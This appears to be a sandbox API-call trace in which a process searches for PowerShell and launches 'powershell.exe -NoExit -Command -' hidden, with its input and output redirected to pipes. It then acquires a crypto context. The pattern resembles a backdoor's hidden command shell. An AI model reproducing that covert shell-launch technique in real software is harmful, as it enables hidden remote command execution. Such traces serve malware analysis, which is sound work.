returned 0xffffffff [0091.176] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\powershell.exe.bat" (normalized: "c:\\windows\\powershell.exe.bat"), fInfoLevelId=0x0, lpFileInformation=0x110bb93c | out: lpFileInformation=0x110bb93c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0091.176] CreateFileW (lpFileName="C:\\WINDOWS\\powershell.exe.bat" (normalized: "c:\\windows\\powershell.exe.bat"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0091.176] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\powershell.exe.cmd" (normalized: "c:\\windows\\powershell.exe.cmd"), fInfoLevelId=0x0, lpFileInformation=0x110bb93c | out: lpFileInformation=0x110bb93c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0091.177] CreateFileW (lpFileName="C:\\WINDOWS\\powershell.exe.cmd" (normalized: "c:\\windows\\powershell.exe.cmd"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0091.177] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\powershell.exe.vbs" (normalized: "c:\\windows\\powershell.exe.vbs"), fInfoLevelId=0x0, lpFileInformation=0x110bb93c | out: lpFileInformation=0x110bb93c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0091.177] CreateFileW (lpFileName="C:\\WINDOWS\\powershell.exe.vbs" (normalized: "c:\\windows\\powershell.exe.vbs"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0091.177] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\powershell.exe.vbe" (normalized: "c:\\windows\\powershell.exe.vbe"), fInfoLevelId=0x0, lpFileInformation=0x110bb93c | out: lpFileInformation=0x110bb93c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0091.177] CreateFileW (lpFileName="C:\\WINDOWS\\powershell.exe.vbe" (normalized: "c:\\windows\\powershell.exe.vbe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0091.177] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\powershell.exe.js" (normalized: "c:\\windows\\powershell.exe.js"), fInfoLevelId=0x0, lpFileInformation=0x110bb93c | out: lpFileInformation=0x110bb93c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0091.177] CreateFileW (lpFileName="C:\\WINDOWS\\powershell.exe.js" (normalized: "c:\\windows\\powershell.exe.js"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0091.177] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\powershell.exe.jse" (normalized: "c:\\windows\\powershell.exe.jse"), fInfoLevelId=0x0, lpFileInformation=0x110bb93c | out: lpFileInformation=0x110bb93c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0091.177] CreateFileW (lpFileName="C:\\WINDOWS\\powershell.exe.jse" (normalized: "c:\\windows\\powershell.exe.jse"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0091.177] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\powershell.exe.wsf" (normalized: "c:\\windows\\powershell.exe.wsf"), fInfoLevelId=0x0, lpFileInformation=0x110bb93c | out: lpFileInformation=0x110bb93c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0091.177] CreateFileW (lpFileName="C:\\WINDOWS\\powershell.exe.wsf" (normalized: "c:\\windows\\powershell.exe.wsf"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0091.177] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\powershell.exe.wsh" (normalized: "c:\\windows\\powershell.exe.wsh"), fInfoLevelId=0x0, lpFileInformation=0x110bb93c | out: lpFileInformation=0x110bb93c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0091.178] CreateFileW (lpFileName="C:\\WINDOWS\\powershell.exe.wsh" (normalized: "c:\\windows\\powershell.exe.wsh"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0091.178] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\powershell.exe.msc" (normalized: "c:\\windows\\powershell.exe.msc"), fInfoLevelId=0x0, lpFileInformation=0x110bb93c | out: lpFileInformation=0x110bb93c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0091.178] CreateFileW (lpFileName="C:\\WINDOWS\\powershell.exe.msc" (normalized: "c:\\windows\\powershell.exe.msc"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0091.178] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem\\powershell.exe" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe"), fInfoLevelId=0x0, lpFileInformation=0x110bb93c | out: lpFileInformation=0x110bb93c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0091.289] SetEvent (hEvent=0x174) returned 1 [0091.289] CreateFileW (lpFileName="C:\\WINDOWS\\System32\\Wbem\\powershell.exe" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0091.290] VirtualAlloc (lpAddress=0x11114000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0x11114000 [0091.290] VirtualAlloc (lpAddress=0x11116000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0x11116000 [0091.291] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem\\powershell.exe.com" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe.com"), fInfoLevelId=0x0, lpFileInformation=0x110bb93c | out: lpFileInformation=0x110bb93c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0091.291] CreateFileW (lpFileName="C:\\WINDOWS\\System32\\Wbem\\powershell.exe.com" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe.com"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0091.291] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem\\powershell.exe.exe" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe.exe"), fInfoLevelId=0x0, lpFileInformation=0x110bb93c | out: lpFileInformation=0x110bb93c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0091.291] CreateFileW (lpFileName="C:\\WINDOWS\\System32\\Wbem\\powershell.exe.exe" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe.exe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0091.291] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem\\powershell.exe.bat" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe.bat"), fInfoLevelId=0x0, lpFileInformation=0x110bb93c | out: lpFileInformation=0x110bb93c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0091.291] CreateFileW (lpFileName="C:\\WINDOWS\\System32\\Wbem\\powershell.exe.bat" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe.bat"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0091.291] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem\\powershell.exe.cmd" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe.cmd"), fInfoLevelId=0x0, lpFileInformation=0x110bb93c | out: lpFileInformation=0x110bb93c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0091.291] CreateFileW (lpFileName="C:\\WINDOWS\\System32\\Wbem\\powershell.exe.cmd" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe.cmd"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0091.291] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem\\powershell.exe.vbs" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe.vbs"), fInfoLevelId=0x0, lpFileInformation=0x110bb93c | out: lpFileInformation=0x110bb93c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0091.291] CreateFileW (lpFileName="C:\\WINDOWS\\System32\\Wbem\\powershell.exe.vbs" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe.vbs"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0091.291] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem\\powershell.exe.vbe" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe.vbe"), fInfoLevelId=0x0, lpFileInformation=0x110bb93c | out: lpFileInformation=0x110bb93c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0091.291] CreateFileW (lpFileName="C:\\WINDOWS\\System32\\Wbem\\powershell.exe.vbe" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe.vbe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0091.292] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem\\powershell.exe.js" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe.js"), fInfoLevelId=0x0, lpFileInformation=0x110bb93c | out: lpFileInformation=0x110bb93c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0091.292] CreateFileW (lpFileName="C:\\WINDOWS\\System32\\Wbem\\powershell.exe.js" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe.js"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0091.292] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem\\powershell.exe.jse" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe.jse"), fInfoLevelId=0x0, lpFileInformation=0x110bb93c | out: lpFileInformation=0x110bb93c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0091.292] CreateFileW (lpFileName="C:\\WINDOWS\\System32\\Wbem\\powershell.exe.jse" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe.jse"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0091.292] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem\\powershell.exe.wsf" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe.wsf"), fInfoLevelId=0x0, lpFileInformation=0x110bb93c | out: lpFileInformation=0x110bb93c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0091.292] CreateFileW (lpFileName="C:\\WINDOWS\\System32\\Wbem\\powershell.exe.wsf" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe.wsf"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0091.292] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem\\powershell.exe.wsh" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe.wsh"), fInfoLevelId=0x0, lpFileInformation=0x110bb93c | out: lpFileInformation=0x110bb93c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0091.292] CreateFileW (lpFileName="C:\\WINDOWS\\System32\\Wbem\\powershell.exe.wsh" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe.wsh"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0091.292] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem\\powershell.exe.msc" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe.msc"), fInfoLevelId=0x0, lpFileInformation=0x110bb93c | out: lpFileInformation=0x110bb93c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0091.292] CreateFileW (lpFileName="C:\\WINDOWS\\System32\\Wbem\\powershell.exe.msc" (normalized: "c:\\windows\\system32\\wbem\\powershell.exe.msc"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0091.293] VirtualAlloc (lpAddress=0x11118000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0x11118000 [0091.293] VirtualAlloc (lpAddress=0x1111a000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0x1111a000 [0091.293] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"), fInfoLevelId=0x0, lpFileInformation=0x110bb93c | out: lpFileInformation=0x110bb93c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9fdc1d0a, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x9fdc1d0a, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x9fdc1d0a, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x69000)) returned 1 [0091.297] VirtualAlloc (lpAddress=0x1103a000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0x1103a000 [0091.298] GetProcAddress (hModule=0x772d0000, lpProcName="CreatePipe") returned 0x772e4590 [0091.298] CreatePipe (in: hReadPipe=0x110bbcc4, hWritePipe=0x110bbcc8, lpPipeAttributes=0x0, nSize=0x0 | out: hReadPipe=0x110bbcc4*=0x180, hWritePipe=0x110bbcc8*=0x184) returned 1 [0091.299] VirtualAlloc (lpAddress=0x1103c000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0x1103c000 [0091.299] CreatePipe (in: hReadPipe=0x110bbcc8, hWritePipe=0x110bbccc, lpPipeAttributes=0x0, nSize=0x0 | out: hReadPipe=0x110bbcc8*=0x188, hWritePipe=0x110bbccc*=0x18c) returned 1 [0091.299] CreatePipe (in: hReadPipe=0x110bbcc8, hWritePipe=0x110bbccc, lpPipeAttributes=0x0, nSize=0x0 | out: hReadPipe=0x110bbcc8*=0x190, hWritePipe=0x110bbccc*=0x194) returned 1 [0091.299] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x110120d0, nSize=0x64 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0091.299] VirtualAlloc (lpAddress=0x1103e000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0x1103e000 [0091.300] VirtualAlloc (lpAddress=0x11040000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0x11040000 [0091.300] VirtualAlloc (lpAddress=0x11042000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0x11042000 [0091.300] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"), fInfoLevelId=0x0, lpFileInformation=0x110bb874 | out: lpFileInformation=0x110bb874*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9fdc1d0a, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x9fdc1d0a, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x9fdc1d0a, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x69000)) returned 1 [0091.300] GetProcAddress (hModule=0x772d0000, lpProcName="GetEnvironmentStringsW") returned 0x772e4eb0 [0091.300] GetEnvironmentStringsW () returned 0xa00878* [0091.301] VirtualAlloc (lpAddress=0x11044000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0x11044000 [0091.301] VirtualAlloc (lpAddress=0x11046000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0x11046000 [0091.301] VirtualAlloc (lpAddress=0x11048000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0x11048000 [0091.301] VirtualAlloc (lpAddress=0x1104a000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0x1104a000 [0091.302] VirtualAlloc (lpAddress=0x1104c000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0x1104c000 [0091.302] VirtualAlloc (lpAddress=0x1104e000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0x1104e000 [0091.302] VirtualAlloc (lpAddress=0x11050000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0x11050000 [0091.303] VirtualAlloc (lpAddress=0x11052000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0x11052000 [0091.303] VirtualAlloc (lpAddress=0x11054000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0x11054000 [0091.303] VirtualAlloc (lpAddress=0x11056000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0x11056000 [0091.304] GetProcAddress (hModule=0x772d0000, lpProcName="FreeEnvironmentStringsW") returned 0x772e4c20 [0091.304] FreeEnvironmentStringsW (penv=0xa00878) returned 1 [0091.304] VirtualAlloc (lpAddress=0x11058000, dwSize=0x2000, flAllocationType=0x1000, flProtect=0x4) returned 0x11058000 [0091.304] GetProcAddress (hModule=0x772d0000, lpProcName="GetCurrentProcess") returned 0x7733ea10 [0091.304] GetCurrentProcess () returned 0xffffffff [0091.304] GetProcAddress (hModule=0x772d0000, lpProcName="DuplicateHandle") returned 0x7733eac0 [0091.304] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x180, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x11010190, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x11010190*=0x198) returned 1 [0091.304] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x18c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x11010194, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x11010194*=0x19c) returned 1 [0091.304] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x194, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x11010198, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x11010198*=0x1a0) returned 1 [0091.304] VirtualAlloc (lpAddress=0x1105a000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x1105a000 [0091.305] VirtualAlloc (lpAddress=0x1105e000, dwSize=0x6000, flAllocationType=0x1000, flProtect=0x4) returned 0x1105e000 [0091.308] VirtualAlloc (lpAddress=0x11064000, dwSize=0x6000, flAllocationType=0x1000, flProtect=0x4) returned 0x11064000 [0091.308] GetProcAddress (hModule=0x772d0000, lpProcName="CreateProcessW") returned 0x772e4610 [0091.308] CreateProcessW (in: lpApplicationName="C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpCommandLine="powershell.exe -NoExit -Command -", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x400, lpEnvironment=0x11064000, lpCurrentDirectory=0x0, lpStartupInfo=0x110bbb80*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x198, hStdOutput=0x19c, hStdError=0x1a0), lpProcessInformation=0x110bbafc | out: lpCommandLine="powershell.exe -NoExit -Command -", lpProcessInformation=0x110bbafc*(hProcess=0x1a8, hThread=0x1a4, dwProcessId=0x1064, dwThreadId=0x1068)) returned 1 [0092.063] SetEvent (hEvent=0x174) returned 1 [0092.063] GetProcAddress (hModule=0x772d0000, lpProcName="CloseHandle") returned 0x7733eab0 [0092.063] CloseHandle (hObject=0x1a4) returned 1 [0092.063] CloseHandle (hObject=0x1a0) returned 1 [0092.063] CloseHandle (hObject=0x19c) returned 1 [0092.063] CloseHandle (hObject=0x198) returned 1 [0092.064] CancelIoEx (hFile=0x180, lpOverlapped=0x0) returned 0 [0092.064] CloseHandle (hObject=0x180) returned 1 [0092.064] CancelIoEx (hFile=0x18c, lpOverlapped=0x0) returned 0 [0092.064] CloseHandle (hObject=0x18c) returned 1 [0092.064] CancelIoEx (hFile=0x194, lpOverlapped=0x0) returned 0 [0092.064] CloseHandle (hObject=0x194) returned 1 [0092.064] VirtualAlloc (lpAddress=0x0, dwSize=0x40000, flAllocationType=0x3000, flProtect=0x4) returned 0x31200000 [0092.064] CreateIoCompletionPort (FileHandle=0xffffffff, ExistingCompletionPort=0x0, CompletionKey=0x0, NumberOfConcurrentThreads=0xffffffff) returned 0x194 [0092.065] LoadLibraryExW (lpLibFileName="advapi32.dll", hFile=0x0, dwFlags=0x800) returned 0x756e0000 [0092.065] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContextW") returned 0x756ffa40 [0092.065] CryptAcquireContextW (in: phProv=0x110a00a4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x110a00a4*=0xa01080) returned 1 